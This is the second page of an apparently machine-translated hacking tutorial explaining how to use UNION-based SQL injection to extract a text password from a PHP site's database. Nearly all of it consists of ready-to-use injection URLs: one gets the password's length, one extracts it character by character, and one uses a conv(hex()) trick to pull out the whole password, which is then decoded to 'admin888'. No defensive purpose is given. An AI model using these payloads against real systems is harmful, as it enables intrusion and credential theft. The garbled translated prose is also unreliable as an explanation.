Not only everybody knows in the union inquiry around the enumeration must be equal, the type must be the same. Then pours into this hits the mark, the preceding inquiry returns value type should be a digit, but we, if wants to use the union inquiry to obtain the type is text password, how should manage?
Actually we may find out the password length first:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20length(password)%20from%20test%23
The returns result is 8. OK, comes again:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20ascii(mid(password,1,1))%20from%20test
The returns result is the password first ASCII code value, then looked up each on OK.
However we have a more convenient method actually, heh heh, an inquiry sufficed.
We submit:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20conv(hex(password),16,10)%20from%20test
Returns 7017854418938247224. The transformation is 16 enters the system is 0x61646D696E383838, it is “admin888” 16 systems. , The principle did not say, believed that everybody “raised second is the egg”.
In the test does not need the conv function to transform the type to meet does not match, the perspiration, does not know the reason.
Ok! Talked nonsense finishes.
Other pages: : <<Prev * 1 * 2
|